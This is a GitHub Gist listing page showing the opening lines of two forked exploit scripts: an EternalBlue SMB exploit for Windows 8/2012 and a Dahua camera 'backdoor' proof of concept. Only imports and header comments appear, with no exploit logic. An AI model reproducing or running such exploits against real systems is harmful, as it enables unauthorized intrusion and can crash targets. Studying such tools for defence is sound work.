Skip to content

Instantly share code, notes, and snippets.

@huyna
huyna / eternalblue8_exploit.py
Created May 18, 2017 01:50 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@huyna
huyna / dahua-backdoor.py
Created November 16, 2017 01:14 — forked from cre8tions/dahua-backdoor.py
dahua exploit poc
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string